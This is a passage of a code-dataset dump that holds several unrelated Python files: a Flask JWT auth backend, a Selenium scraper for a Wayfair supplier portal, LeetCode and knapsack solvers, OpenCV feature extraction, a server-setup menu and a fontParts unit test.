{"seq_id":"203734063","text":"from app.mac import mac, signals\n\n'''\nSignals this module listens to:\n1. When a message is received (signals.message_received)\n==========================================================\n'''\n@signals.message_received.connect\ndef handle(message):\n    print(message)\n    mac.send_message(\"recibido\", message.conversation)\n","sub_path":"modules/api/whatsapp.py","file_name":"whatsapp.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"508579417","text":"def superEggDrop(K: int, N: int) -> int:\n\n    # DP state definition:\n    # dp[k][m] = n\n    # with k eggs and at most m throws, we can determine the answer for an n-floor building\n    dp = [[0 for _ in range(N+1)] for _ in range(K+1)]\n\n    m = 0\n\n    while dp[K][m] < N:\n        m += 1\n        for k in range(1, K + 1):\n            dp[k][m] = dp[k][m-1] + dp[k-1][m-1] + 1\n\n    return m\n\n\nprint(superEggDrop(2,6))\n\n\n\n# Advanced DP\n# class Solution:\n#     def superEggDrop(self, K: int, N: int) -> int:\n#         memo = {}\n#\n#         def dp(K, N) -> int:\n#             if K == 1:\n#                 return N\n#             if N == 0:\n#                 return 0\n#\n#             if (K, N) in memo:\n#                 return memo[(K, N)]\n#\n#             res = float('inf')\n#             low, high = 1, N\n#             while low <= high:\n#                 mid = (low + high) // 2\n#                 broke = dp(K - 1, mid - 1)\n#                 not_broke = dp(K, N - mid)\n#                 if broke > not_broke:\n#                     high = mid - 1\n#                     res = min(res, broke + 1)\n#                 else:\n#                     low = mid + 1\n#                     res = min(res, not_broke + 1)\n#\n#         memo[(K, N)] = res\n#         return memo[(K, N)]\n#\n#         return dp(K, N)\n#\n#\n# demo = Solution()\n# print(demo.superEggDrop(4, 2000))\n# print(demo.memo)\n\n\n\n# Brute-force DP\n# class Solution:\n#     def __init__(self):\n#         self.memo = dict()\n#\n#     def superEggDrop(self, K: int, N: int) -> int:\n#         def dp(K, N) -> int:\n#             if K == 1: return N\n#             if N == 0: return 0\n#\n#             if (K, N) in self.memo:\n#                 return self.memo[(K, N)]\n#\n#             res = float('INF')\n#\n#             for i in range(1, N + 1):\n#                 res = min(res, max(dp(K - 1, i - 1), dp(K, N - i)) + 1)\n#\n#             self.memo[(K, N)] = res\n#             return self.memo[(K, N)]\n#\n#         return dp(K, N)\n\n","sub_path":"leetcode/887.py","file_name":"887.py","file_ext":"py","file_size_in_byte":1933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"101107856","text":"from flask import Flask, request, jsonify, make_response, send_file\r\nfrom flask_sqlalchemy import SQLAlchemy\r\nfrom flask_bcrypt import Bcrypt\r\nfrom helper import bcrypt,db\r\nfrom flask_marshmallow import Marshmallow\r\nfrom flask_cors import CORS\r\nfrom functools import wraps\r\nfrom helper import create_app\r\nfrom ml import PredictDisease\r\nfrom flask_login import current_user\r\nimport jwt\r\nimport json\r\nimport datetime\r\nimport os\r\nimport uuid\r\nimport base64\r\nimport re\r\nfrom cost import HealthExpenditure\r\n\r\napp=create_app()\r\n\r\ndef token_required(func):\r\n    def wrapper(*args,**kwargs):\r\n\r\n        token = request.headers.get('x-auth-token')\r\n\r\n        if not token:\r\n            return jsonify({'message':'Token is 
missing'})\r\n \r\n try:\r\n data = jwt.decode(token,app.config['SECRET_KEY'])\r\n request.data = data\r\n except:\r\n return jsonify({'message':'invalid token'})\r\n return func(*args,**kwargs)\r\n wrapper.__name__ = func.__name__\r\n return wrapper\r\n\r\n\r\n\r\nfrom models import User,Post\r\n\r\n#auth decorator to act as middleware\r\n\r\n@app.route(\"/\",methods=[\"GET\"])\r\ndef getpost():\r\n return jsonify({'message':\"something\"})\r\n\r\n@app.route(\"/register\",methods=[\"POST\"]) \r\ndef register():\r\n #if request.method=='GET':\r\n #return jsonify({'message':\"Get request made\"})\r\n req = request.json\r\n if(req.get('username') and req.get('email') and req.get('password')):\r\n # print(req['email'])\r\n \r\n user = User.query.filter_by(email= req['email']).first()\r\n\r\n if(user):\r\n return jsonify({'message':'2'})\r\n\r\n password = bcrypt.generate_password_hash(req['password']).decode('utf-8')\r\n user1 = User(username=req['username'],email=req['email'],password=password,)\r\n db.session.add(user1)\r\n db.session.commit()\r\n token = jwt.encode({'id':user1.id,'exp': datetime.datetime.utcnow() + datetime.timedelta(minutes=180)},app.config['SECRET_KEY']) \r\n # print(\"token:\"+token.decode('UTF-8'))\r\n if token:\r\n resp = {\r\n 'token': token.decode('UTF-8'),\r\n 'user' : {\r\n 'username':user1.username,\r\n 'email': user1.email,\r\n 'id' : user1.id\r\n }\r\n } \r\n return jsonify(resp)\r\n else:\r\n return jsonify({'message':'3'})\r\n else:\r\n return jsonify({'message': '1'})\r\n \r\n\r\n@app.route(\"/login\",methods=[\"POST\"])\r\ndef login():\r\n req = request.json\r\n if(req.get('email') and req.get('password')):\r\n user = User.query.filter_by(email= req['email']).first()\r\n if(user):\r\n if(bcrypt.check_password_hash(user.password,req['password'])):\r\n #things to do after checking the email and password\r\n token = jwt.encode({'id':user.id,'exp': datetime.datetime.utcnow() + datetime.timedelta(minutes=180)},app.config['SECRET_KEY']) \r\n # print(\"token:\"+token.decode('UTF-8'))\r\n if token:\r\n resp = {\r\n 'token': token.decode('UTF-8'),\r\n 'user' : {\r\n 'username':user.username,\r\n 'email': user.email,\r\n 'id' : user.id\r\n }\r\n } \r\n return jsonify(resp)\r\n else:\r\n return jsonify({'message':'3'})\r\n else:\r\n return jsonify({'message':'4'})\r\n else:\r\n return jsonify({'message':'2'})\r\n else:\r\n return jsonify({'message':'1'})\r\n\r\n@app.route('/predict',methods=['GET','POST'])\r\ndef predict():\r\n data=request.json.get('key')\r\n data=data.split(',')\r\n #print(data)\r\n calc=PredictDisease(data)\r\n output=calc.make_prediction()\r\n return jsonify(output)\r\n\r\n@app.route('/cost',methods=['GET','POST'])\r\ndef cost():\r\n data=request.json.get('key')\r\n #data=data.split(',')\r\n print(data)\r\n calc=HealthExpenditure(data)\r\n output=calc.predict()\r\n output=round(output,2)\r\n print(output)\r\n return jsonify(output)\r\n #return jsonify(\"ssssssssssssssssss\")\r\n\r\n@app.route('/profile/',methods=['GET'])\r\n@token_required\r\ndef profile():\r\n data = request.data\r\n user = User.query.get(data['id'])\r\n if user:\r\n resp ={\r\n \"id\":user.id,\r\n 'username':user.username,\r\n 'email':user.email,\r\n \"image_file\":user.image_file,\r\n \"posts\":user.posts\r\n }\r\n return jsonify(resp)\r\n else:\r\n return jsonify({'message':'This is a protected'})\r\n\"\"\"@app.route('/update/',methods=['POST'])\r\n@token_required\r\ndef update():\r\n data = request.data\r\n user = User.query.get(data['id'])\r\n user.\r\n return 
jsonify(resp)\r\n else:\r\n return jsonify({'message':'This is a protected'})\"\"\"\r\n\r\ndef getApp():\r\n return app\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True,port=5000,host=\"0.0.0.0\")\r\n","sub_path":"PredxHack2020/backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"383368953","text":"import time\r\nimport pandas as pd\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.ui import Select\r\nfrom selenium.webdriver.common.keys import Keys\r\nimport os\r\n# Today's date\r\ndate_label = time.strftime('%Y%m%d')\r\n\r\ntry:\r\n #local test Directory\r\n# work_dir = 'Y:\\\\0047Automate_Script\\\\DLpack_Wayfair\\\\'\r\n# Download_dir = 'Y:\\\\0047Automate_Script\\\\DLpack_Wayfair\\\\temp_DL_file\\\\'\r\n# final_Inv_dir = 'Y:\\\\0047Automate_Script\\\\DLpack_Wayfair\\\\'\r\n# CAN_final_Inv_dir = 'Y:\\\\0047Automate_Script\\\\DLpack_Wayfair\\\\'\r\n# driver_path = 'C:\\\\Users\\\\PC\\\\chrome\\\\chromedriver.exe'\r\n\r\n work_dir = 'C:\\\\Users\\\\User\\\\Desktop\\\\0047Automate_Script\\\\DLpack_Wayfair\\\\'\r\n Download_dir = 'C:\\\\Users\\\\User\\\\Desktop\\\\0047Automate_Script\\\\DLpack_Wayfair\\\\temp_DL_file\\\\'\r\n final_Inv_dir = 'C:\\\\Users\\\\User\\\\Desktop\\\\0047Automate_Script\\\\DLpack_Wayfair\\\\'\r\n CAN_final_Inv_dir = 'C:\\\\Users\\\\User\\\\Desktop\\\\0047Automate_Script\\\\DLpack_Wayfair\\\\'\r\n driver_path = 'C:\\\\Users\\\\User\\\\Anaconda3\\\\chrome\\\\chromedriver.exe'\r\n\r\n os.chdir(work_dir)\r\nexcept:\r\n # Directory\r\n work_dir = 'C:\\\\Users\\\\raymond.hung\\\\Documents\\\\Automate_Script\\\\DLpack_Wayfair\\\\'\r\n Download_dir = 'N:\\\\E Commerce\\\\Public Share\\\\Dot Com - Wayfair\\\\Product Watchlist\\\\temp_DL_file\\\\'\r\n final_Inv_dir = 'N:\\\\E Commerce\\\\Public Share\\\\Dot Com - Wayfair\\\\Product Watchlist\\\\'\r\n driver_path = 'C:\\\\Users\\\\raymond.hung\\\\chrome\\\\chromedriver.exe'\r\n os.chdir(work_dir)\r\n\r\n# Account and Password\r\nlogin_info = pd.read_csv(work_dir+ 'Account & Password.csv',index_col=0)\r\nusername = login_info.loc['Account', 'CONTENT']\r\npassword = login_info.loc['Password', 'CONTENT']\r\n\r\n# Chrome driver setting\r\noptions = webdriver.ChromeOptions()\r\noptions.add_argument('--start-maximized')\r\nprefs = {'profile.default_content_settings.popups': '0', 'download.default_directory' : Download_dir}\r\noptions.add_experimental_option('prefs', prefs)\r\ndriver = webdriver.Chrome(driver_path,chrome_options=options)\r\n\r\n# Wayfair supplier website\r\nWF_Extrant = 'https://partners.wayfair.com'\r\ndriver.get(WF_Extrant)\r\n\r\nLoadingChecker = (By.XPATH, '//*[@id=\"login\"]/button')\r\nWebDriverWait(driver, 120).until(EC.presence_of_element_located(LoadingChecker))\r\n# Input username and password and login\r\ndriver.find_element_by_id('js-username').send_keys(username)\r\ndriver.find_element_by_id('password_field').send_keys(password)\r\ndriver.find_element_by_xpath('//*[@id=\"login\"]/button').click()\r\ntime.sleep(10)\r\n\r\n# Click select box to choose US\r\ncss_body = 'body'\r\nif driver.find_element_by_css_selector(css_body).get_attribute('class') == ' extranet ':\r\n LOC = {'US':'Topline Furniture Warehouse Corp.', 'CAN':'CAN_Topline Furniture Warehouse Corp.'}\r\n 
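# NOTE: the CSS selector chains below were copied from Wayfair's extranet DOM as it looked when this script was written;\r\n    # they are auto-generated class names, so treat them as brittle, site-specific assumptions and re-verify them whenever the page layout changes.\r\n    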
css_common='body > div.wrapper > div:nth-child(1) > header > div > div > div.PH-Header > div > div.ex-Grid-item.ex-Grid-item--flex.u-flexShrink.ex-Grid-item--column.u-justifyEnd > div > div.PH-Header-information > div'\r\n LoadingChecker = (By.CSS_SELECTOR, css_common+' > span.ex-Box.ex-Block.ex-Block--display-flex.ex-Block--isFlex.ex-Block--flexWrap-wrap.ex-Block--alignItems-center.ex-Block--display-flex.ex-Box--ml-small')\r\n WebDriverWait(driver, 30).until(EC.presence_of_element_located(LoadingChecker))\r\n driver.find_element_by_css_selector(css_common+' > span.ex-Box.ex-Block.ex-Block--display-flex.ex-Block--isFlex.ex-Block--flexWrap-wrap.ex-Block--alignItems-center.ex-Block--display-flex.ex-Box--ml-small').click()\r\n for i in range(1, 3):\r\n try:\r\n box_text = driver.find_element_by_css_selector(css_common+'> span.PH-HeaderDropdown-value > ul > li:nth-child('+str(i)+') > button').text\r\n if box_text == 'Topline Furniture Warehouse Corp.':\r\n driver.find_element_by_css_selector(css_common+'> span.PH-HeaderDropdown-value > ul > li:nth-child('+str(i)+') > button').click()\r\n time.sleep(30)\r\n break\r\n except:\r\n print(\"switch LOC fail\")\r\n driver.refresh()\r\n time.sleep(30)\r\n\r\nelif driver.find_element_by_css_selector(css_body).get_attribute('class') == ' extranet body_new_layout':\r\n LOC ={'US':'Topline', 'CAN':'CAN_Topline Furniture'}\r\n css_select_box = 'body > div.wrapper.wrapper_new_layout > div > div > div.BaseBox-ofhg3j-0.dfeQgM > div.BaseBox-ofhg3j-0.bSmOIL > div > div > div.BaseBox-ofhg3j-0.gknKYY > div:nth-child(1) > div > button > div.BaseBox-ofhg3j-0.dBiCLz'\r\n LoadingChecker = (By.CSS_SELECTOR, css_select_box)\r\n WebDriverWait(driver, 30).until(EC.presence_of_element_located(LoadingChecker))\r\n driver.find_element_by_css_selector(css_select_box).click()\r\n for i in range(1, 3):\r\n try:\r\n css_box_text = 'body > div.wrapper.wrapper_new_layout > div > div > div.BaseBox-ofhg3j-0.dfeQgM > div.BaseBox-ofhg3j-0.bSmOIL > div > div > div.BaseBox-ofhg3j-0.gknKYY > div:nth-child(1) > div.react-tiny-popover-container > div > ul > li:nth-child('+str(i)+') > button > div'\r\n box_text = driver.find_element_by_css_selector(css_box_text).text\r\n if box_text == 'Topline':\r\n driver.find_element_by_css_selector(css_box_text).click()\r\n time.sleep(30)\r\n break\r\n except:\r\n print(\"switch LOC fail\")\r\n driver.refresh()\r\n time.sleep(30)\r\n\r\n#click Product Watchlist-ALL\r\ndriver.find_element_by_xpath('//*[@id=\"tab:2\"]/span/span[1]').click()\r\n\r\n#20rows\r\ns1 = Select(driver.find_element_by_xpath('//*[@id=\"panel:2\"]/div[2]/div[2]/div/div[2]/span[2]/select'))\r\ns1.select_by_visible_text('20 rows')\r\ntime.sleep(10)\r\n\r\n#page1\r\nfor i in range(0,3):\r\n driver.find_element_by_xpath('//*[@id=\"panel:2\"]/div[2]/div[2]/div/div[2]/span[1]/div/input').send_keys(Keys.BACK_SPACE)\r\ndriver.find_element_by_xpath('//*[@id=\"panel:2\"]/div[2]/div[2]/div/div[2]/span[1]/div/input').send_keys(\"1\")\r\ndriver.find_element_by_xpath('//*[@id=\"panel:2\"]/div[2]/div[2]/div/div[2]/span[1]/div/input').send_keys(Keys.ENTER)\r\n\r\ntime.sleep(10)\r\n\r\n#title\r\ntable_top_list=driver.find_element_by_xpath('//*[@id=\"panel:2\"]/div[2]/div[1]/div[1]/div').text.splitlines() \r\ntable_top_list.insert(5,'Customer Score')\r\ndata = pd.DataFrame(columns=table_top_list)\r\ndata_row=0\r\n\r\nt_page=int(driver.find_element_by_class_name('-totalPages').text)\r\n#page104\r\nfor page in range(0,t_page-1):\r\n pagechecker = 'rt-tr-group'\r\n LoadingChecker = (By.CLASS_NAME, 
pagechecker)\r\n WebDriverWait(driver, 60).until(EC.presence_of_element_located(LoadingChecker))\r\n #content\r\n while 1==1: # waiting for javascript ready\r\n try:\r\n item_table=driver.find_elements_by_class_name('rt-tr-group')\r\n break\r\n except:\r\n time.sleep(3)\r\n pass\r\n for row in range(0,20):\r\n item_info=item_table[row].text.splitlines() \r\n if len(item_info)<8:\r\n item_info.insert(5,'-')\r\n data.loc[data_row]=item_info\r\n else:\r\n data.loc[data_row]=item_info\r\n #next page\r\n data_row+=1\r\n while 1==1: # waiting for javascript ready\r\n try:\r\n driver.find_element_by_xpath('//*[@id=\"panel:2\"]/div[2]/div[2]/div/div[3]').click()\r\n break\r\n except:\r\n time.sleep(10)\r\n pass\r\n print(page)\r\n \r\ndata.to_csv(final_Inv_dir+'Product Watchlist'+date_label+'.csv',index=False)\r\n\r\n\r\n\r\n \r\ndriver.quit() \r\n\r\n\r\n\r\n\r\n","sub_path":"DL_WF_Product_Watchlist.py","file_name":"DL_WF_Product_Watchlist.py","file_ext":"py","file_size_in_byte":7589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"213681828","text":"from pathlib import Path\nimport time\nimport random\n\nimport cv2\nimport numpy as np\nfrom numpy.lib.ufunclike import _fix_and_maybe_deprecate_out_named_y\n\n\"\"\" functions \"\"\"\n\ndef create_dataset(valid_tags_path, rejected_tags_path, bins=4):\n\n # creates a histogram if a image\n def find_image_features(path):\n features = []\n\n # read image, find shape\n img = cv2.imread(str(path), 0)\n width, height = img.shape\n\n # create histogram and convert to percentiles\n hist = cv2.calcHist([img], [0], None, [bins], [0, 256])\n histogram_bins = list(np.array(hist[:, 0], np.float32) / (width * height))\n features.extend(histogram_bins)\n\n # count edges\n edges = cv2.Canny(img, 100, 200, apertureSize=3)\n edge_pixels = np.sum(edges == 255) / edges.size\n features.append(edge_pixels)\n\n # do fft\n f = np.fft.fft2(img)\n fft_sum = (np.sum(f.real) / f.size) / 255\n features.append(fft_sum)\n\n\n # return histogram\n return features\n\n # finds images in folder and returns a list\n def find_images(path_str):\n input_path = Path(path_str)\n image_path_list = list(input_path.glob(\"*.png\"))\n\n # quality control\n if len(image_path_list) == 0:\n print(f\"Found 0 images in \\\"{input_path}\\\"\")\n return None\n else:\n return image_path_list\n\n # input data folders\n valid_tags = find_images(valid_tags_path)\n rejected_tags = find_images(rejected_tags_path)\n\n t_start = time.time()\n\n x_data = []\n y_label = []\n for img_path in valid_tags:\n # hist, n_edges, fft_sum = find_image_features(img_path)\n x_data.append(find_image_features(img_path))\n y_label.append(1)\n\n for img_path in rejected_tags:\n # hist, n_edges, fft_sum = find_image_features(img_path)\n x_data.append(find_image_features(img_path))\n y_label.append(0)\n\n t_completed = time.time() - t_start\n\n # # normalize values to 0,1\n # x_data = np.array(x_data)\n # x_data = x_data / x_data.max(axis=0)\n\n\n # print(f\"Processed {len(valid_tags) + len(rejected_tags)} images in {t_completed:.2f} s\")\n return x_data, y_label\n\n\n\"\"\" main \"\"\"\nif __name__ == \"__main__\":\n # create dataset\n valid = \"evaluation_images/valid_tags/charuco_CH1_35-15_x_png\"\n rejects = \"evaluation_images/rejected_tags/charuco_CH1_35-15_sorted\"\n\n X, y = create_dataset(valid, rejects)\n for i, x in enumerate(X[:5]):\n print(i, x, 
y[i])","sub_path":"evaluation/create_data/create_all-feature_dataset.py","file_name":"create_all-feature_dataset.py","file_ext":"py","file_size_in_byte":2523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"92510138","text":"import os, sys, time\n\n\ndef author():\n\tprint (\"\\n\\tAUTHOR\\n\\t===================================\\n\\tCREATED BY : ahmadrivaldi_arv\\n\\tCODED BY : rivaldi\\n\\tGITHUB : https://github.com/ahmadrivaldi-arv\\n\\t\\t \\n\\tREPORT BUG ON FACEBOOK OR INSTAGRAM\\n\\t===================================\\n\\tfb : ahmad rivaldi\\n\\tig : ahmadrivaldi_arv\\n\\t===================================\\n\\t\")\n\ndef clear():\n\tos.system(\"clear\")\n\nos.system(\"clear\")\n\nauthor()\n\ndef menu():\n\tprint(\"1. Configure IP\")\n\tprint(\"2. Configure DNS\")\n\tprint(\"3. Configure SAMBA\")\n\tprint(\"4. Configure VOIP\")\n\tprint(\"5. Configure FTP\")\n\tprint(\"6. Quit\\n\")\n\t\n\n\tchs=input(\"Choose: \")\n\tif (chs=='1'):\n\t\tfrom modul.ip import menuip\n\t\tos.system(\"clear\")\n\t\tmenuip()\n\telif chs=='2':\n\t\tclear()\n\t\tos.system(\"apt-get install bind9 -y\")\n\t\tinput(\"\\nPress ENTER to continue \")\n\t\tos.system(\"clear\")\n\t\tfrom modul.named import zone\n\t\tzone()\n\telif chs=='3':\n\t\tclear()\n\t\tos.system(\"apt-get install samba -y\")\n\t\tinput(\"\\nPress ENTER to continue \" )\n\t\tos.system(\"clear\")\n\t\tfrom modul.samba import smb\n\t\tsmb()\n\telif chs=='4':\n\t\tclear()\n\t\tprint(\"\\nInsert Debian 8 DVD 2\\n\")\n\t\tos.system(\"apt-cdrom add \")\n\t\tos.system(\"apt-get install asterisk -y\")\n\t\tclear()\n\t\tfrom modul.voip import voip\n\t\tvoip()\n\telif chs=='5':\n\t\tclear()\n\t\tos.system(\"apt-get install proftpd -y\")\n\t\tclear()\n\t\tfrom modul.proftpd import ftp\n\t\tftp()\n\telif chs=='6':\n\t\tsys.exit()\n\telse:\n\t\t\n\t\tprint(\"\\nPlease choose a valid option\\n\")\n\t\tmenu()\n\nmenu()\n\n\n\n#____________________________\n#|\t\t\t\t\t\t\t|\n#|\t\t\tAuthor \t\t\t|\n#|\t\t Ahmad rivaldi\t\t|\n#|__________________________|","sub_path":"menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"466471987","text":"import sys\n\nfrom OmarHuanca.python.session1.AssignmentOperators import AssignmentOperators\nfrom OmarHuanca.python.session1.ComparisonOperators import ComparisonOperators\nfrom OmarHuanca.python.session1.IdentityOperators import IdentityOperators\nfrom OmarHuanca.python.session1.MembershipOperators import MembershipOperators\nfrom OmarHuanca.python.session1.PerformOperation import PerformOperation\n\n\nclass MainMenu:\n\n    def __init__(self):\n\n        self.main_menu()\n\n    def main_menu(self):\n\n        while True:\n            print(\"=========================================================\")\n            print(\"Welcome to Python Operators - Samples\")\n            print(\"=========================================================\")\n            print(\"(1) - Arithmetic's Operators\")\n            print(\"(2) - Comparison Operators\")\n            print(\"(3) - Assignment Operators\")\n            print(\"(4) - Membership Operators\")\n            print(\"(5) - Identity Operators\")\n            print(\"(6) - Practice\")\n            print(\"(7) - Exit\")\n\n            try:\n                option = input('Enter your option: ')\n            except SyntaxError:\n                option = \"\"\n\n            if option == \"1\":\n                self.perform_operation()\n            elif option == \"2\":\n                self.comparison_operators()\n            elif option == \"3\":\n                self.assignment_operators()\n            elif option == \"4\":\n                self.membership_operators()\n            elif option == \"5\":\n                self.identity_operators()\n            elif option == \"6\":\n                self.practice_operator()\n            elif option == \"7\":\n                sys.exit()\n\n    def perform_operation(self):\n\n        PerformOperation(\"+\", 2, 2)\n        PerformOperation(\"-\", 2, 1)\n        PerformOperation(\"*\", 2, 1)\n        PerformOperation(\"/\", 2, 1)\n        PerformOperation(\"%\", 2, 1)\n        PerformOperation(\"**\", 2, 2)\n        PerformOperation(\"//\", -11, 3)\n        PerformOperation(\"++\", 2, 1)\n\n    def comparison_operators(self):\n\n        ComparisonOperators(\"==\", \"a\", \"b\")\n        ComparisonOperators(\"!=\", \"a\", \"b\")\n        ComparisonOperators(\">\", 2, 1)\n        ComparisonOperators(\"<\", 2, 1)\n        ComparisonOperators(\">=\", 2, 1)\n        ComparisonOperators(\"<=\", 2, 2)\n        ComparisonOperators(\">>=\", 2, 1)\n\n    def assignment_operators(self):\n\n        AssignmentOperators(\"=\", 1, 2)\n        AssignmentOperators(\"+=\", 2, 2)\n        AssignmentOperators(\"-=\", 2, 2)\n        AssignmentOperators(\"*=\", 2, 2)\n        AssignmentOperators(\"/=\", 2, 2)\n        AssignmentOperators(\"%=\", 2, 2)\n        AssignmentOperators(\"/==\", 2, 1)\n\n    def membership_operators(self):\n\n        MembershipOperators(\"in\", [1, 2, 3, 4, 5, 6, 7], 4)\n        MembershipOperators(\"in\", [\"a\", \"b\", \"c\", \"d\"], \"b\")\n        MembershipOperators(\"not in\", [1, 2, 3, 4, 5, 6, 7], 0)\n        MembershipOperators(\"not in\", [\"a\", \"b\", \"c\", \"d\"], \"E\")\n        MembershipOperators(\"is in\", [\"a\", \"b\", \"c\", \"d\"], \"E\")\n\n    def identity_operators(self):\n\n        IdentityOperators(\"is\", 4, 4)\n        IdentityOperators(\"is\", \"a\", \"a\")\n        IdentityOperators(\"is not\", 5, 6)\n        IdentityOperators(\"is not\", \"B\", \"b\")\n        IdentityOperators(\"is in\", 1, 1)\n\n    def practice_operator(self):\n\n        print(\"=========================================================\")\n        print(\"Please select Operator to practice \")\n        print(\"(1) - Arithmetic's Operators\")\n        print(\"(2) - Comparison Operators\")\n        print(\"(3) - Assignment Operators\")\n        print(\"(4) - Membership Operators\")\n        print(\"(5) - Identity Operators\")\n\n        try:\n            practice_option = input('Enter your option: ')\n        except SyntaxError:\n            practice_option = \"\"\n\n        if practice_option == \"1\":\n            operator = input(\"Insert Operator: + , - , * , / , % , ** , // : \")\n            first_value = input(\"Insert first number value: \")\n            second_value = input(\"Insert second number value: \")\n            PerformOperation(operator, first_value, second_value)\n        elif practice_option == \"2\":\n            operator = input(\"Insert Operator: == , != , > , < , >= , <= : \")\n            first_value = input(\"Insert first value: \")\n            second_value = input(\"Insert second value: \")\n            ComparisonOperators(operator, first_value, second_value)\n        elif practice_option == \"3\":\n            operator = input(\"Insert Operator: = , += , -= , *= , /= , %= : \")\n            first_value = input(\"Insert first value: \")\n            second_value = input(\"Insert second value: \")\n            AssignmentOperators(operator, first_value, second_value)\n        elif practice_option == \"4\":\n            operator = input(\"Insert Operator: 'in' , 'not in' : \")\n            first_value = input(\"Insert list e.g. '[1,2,3,4,5,]': \")\n            second_value = input(\"Insert value to find on list before \")\n            MembershipOperators(operator, first_value, second_value)\n        elif practice_option == \"5\":\n            operator = input(\"Insert Operator: 'is' , 'is not' : \")\n            first_value = input(\"Insert first value: \")\n            second_value = input(\"Insert second value: \")\n            IdentityOperators(operator, first_value, second_value)\n        elif practice_option == \"7\":\n            pass\n\n\nscript = MainMenu()\n","sub_path":"OmarHuanca/python/session1/MainMenu.py","file_name":"MainMenu.py","file_ext":"py","file_size_in_byte":5351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"50044724","text":"import unittest\nimport collections.abc\nfrom fontParts.base import FontPartsError\n\n\nclass TestGuideline(unittest.TestCase):\n\n    def getGuideline_generic(self):\n        guideline, unrequested = self.objectGenerator(\"guideline\")\n        guideline.x = 1\n        guideline.y = 2\n        guideline.angle = 90\n        return guideline, unrequested\n\n    # --------\n    # Position\n    # --------\n\n    def test_x(self):\n        guideline, unrequested = self.getGuideline_generic()\n        # get\n        self.assertEqual(\n            guideline.x,\n            1\n        )\n        # set: valid\n        guideline.x = 0\n        self.assertEqual(\n            guideline.x,\n            0\n        )\n        guideline.x = 1\n        self.assertEqual(\n            guideline.x,\n            1\n        )\n        guideline.x = -1\n        self.assertEqual(\n            guideline.x,\n            -1\n        )\n        guideline.x = 1.1\n        self.assertEqual(\n            guideline.x,\n            1.1\n        )\n        guideline.x = -1.1\n        self.assertEqual(\n            guideline.x,\n            -1.1\n        )\n        # set: invalid\n        with self.assertRaises(FontPartsError):\n            guideline.x = \"ABC\"\n\n    # ----\n    # Hash\n    # ----\n    def test_hash(self):\n        guideline, unrequested = self.getGuideline_generic()\n        self.assertEqual(\n            isinstance(guideline, collections.abc.Hashable),\n            False\n        )\n\n    # --------\n    # Equality\n    # --------\n\n    def test_equal(self):\n        guideline_one, unrequested = self.getGuideline_generic()\n        guideline_two, unrequested = self.getGuideline_generic()\n        self.assertEqual(\n            guideline_one,\n            guideline_one\n        )\n        self.assertNotEqual(\n            guideline_one,\n            guideline_two\n        )\n        a = guideline_one\n        self.assertEqual(\n            guideline_one,\n            a\n        )\n        self.assertNotEqual(\n            guideline_two,\n            a\n        )\n","sub_path":"Lib/fontParts/test/test_guideline.py","file_name":"test_guideline.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"570321406","text":"from typing import List\nfrom knapsack import Item, Knapsack\nfrom simpleHeuristic import SimpleHeuristic\nfrom metaheuristic import solveMetaheuristic\nfrom hyperheuristic import HyperheuristicNaive, hyperheuristicSolver\nfrom exactSolvers import kpBacktracking, kpDP\nfrom ortools.algorithms import pywrapknapsack_solver\n\ndef kpIP(C: int, items: List[Item]):\n    solver = pywrapknapsack_solver.KnapsackSolver(\n        pywrapknapsack_solver.KnapsackSolver.\n        KNAPSACK_MULTIDIMENSION_CBC_MIP_SOLVER, 'KnapsackExample')\n    \n    profit = [item.getProfit() for item in items]\n    weights = [[item.getWeight() for item in items]]\n    capacities = [C]\n    solver.Init(profit, weights, capacities)\n    computed_value = solver.Solve()\n\n    kp = Knapsack(C)\n    for i, item in enumerate(items):\n        if solver.BestSolutionContains(i):\n            kp.pack(item)\n    return kp\n\ndef ConstructiveSolution(kp: Knapsack, items: List[Item], itemSelector):\n    nextItem = itemSelector.nextItem(kp, items)\n    while nextItem is not None:\n        kp.pack(items[nextItem])\n        items.pop(nextItem)\n        nextItem = itemSelector.nextItem(kp, items)\n    return kp\n\n\ndef 
solver(method: str, kp: Knapsack, items: List[Item], additionalArgs = None):\n if method == 'heuristic':\n simple_heuristic = SimpleHeuristic(additionalArgs)\n return ConstructiveSolution(kp, items, simple_heuristic).getValue()\n elif method == 'SimulatedAnnealing':\n return solveMetaheuristic(method, kp, items, additionalArgs)\n elif method == 'RandomSearch':\n return solveMetaheuristic(method, kp, items, additionalArgs)\n elif method == 'hyperheuristicNaive':\n hh = HyperheuristicNaive(additionalArgs)\n return ConstructiveSolution(kp, items, hh).getValue()\n elif method == 'hyperheuristic':\n return hyperheuristicSolver(kp, items, additionalArgs).getValue()\n elif method == 'recursive':\n return kpBacktracking(kp.getCapacity(), items).getValue()\n elif method == 'DP':\n return kpDP(kp.getCapacity(), items).getValue()\n elif method == 'IP':\n return kpIP(kp.getCapacity(), items).getValue()\n else:\n return 0\n","sub_path":"solvers.py","file_name":"solvers.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"544222360","text":"# -*- coding: utf-8 -*-\nimport pyquery\nimport pymongo\nimport datetime\nimport os\nimport sys\nimport urllib\nimport threading\nfrom time import ctime, sleep\n\n\ndef download_20_pages(skip):\n # Connect MongoDB Server\n client = pymongo.MongoClient(host=\"127.0.0.1\", port=27017)\n # Connect Database\n db = client.beauty\n # Use collection\n collection = db['mm131']\n 